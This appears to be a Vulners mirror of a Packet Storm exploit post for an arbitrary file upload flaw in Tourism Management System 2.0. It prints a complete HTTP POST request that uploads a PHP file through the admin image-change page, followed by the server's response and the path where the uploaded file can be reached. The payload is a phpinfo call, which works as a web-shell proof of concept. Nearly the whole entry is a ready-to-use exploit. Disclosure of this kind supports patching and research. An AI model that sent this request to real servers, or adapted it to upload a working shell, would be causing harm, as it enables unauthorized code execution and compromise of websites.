Lucene search
K

Tourism Management System 2.0 Shell Upload

🗓️ 20 Feb 2024 00:00:00Reported by SoSPiroType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 259 Views

Tourism Management System 2.0 Arbitrary File Upload Vulnerability Exploi

Code
`# Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload  
# Google Dork: N/A  
# Exploit Author: SoSPiro  
# Date: 2024-02-18  
# Vendor Homepage: https://phpgurukul.com  
# Software Link: https://phpgurukul.com/tourism-management-system-free-download/  
# Version: 2.0  
# Tested on: Windows 10 Pro  
# Impact: Allows admin to upload all files to the web server  
# CVE : N/A  
  
  
# Exploit Description:  
The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input.  
  
# PoC request  
  
  
POST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201  
Content-Length: 361  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/zer/tms/admin/change-image.php?imgid=1  
Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhv  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
X-PwnFox-Color: red  
  
-----------------------------390927495111779706051786831201  
Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php"  
Content-Type: text/plain  
  
<?php phpinfo();?>  
-----------------------------390927495111779706051786831201  
Content-Disposition: form-data; name="submit"  
  
  
-----------------------------390927495111779706051786831201--  
  
  
  
  
===========================================================================================  
  
- Response -  
  
HTTP/1.1 200 OK  
Date: Sun, 18 Feb 2024 04:33:37 GMT  
Server: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-dev  
X-Powered-By: PHP/8.1.13  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 8146  
  
============================================================================================  
  
- File location -  
  
http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Feb 2024 00:00Current
7.4High risk
Vulners AI Score7.4
259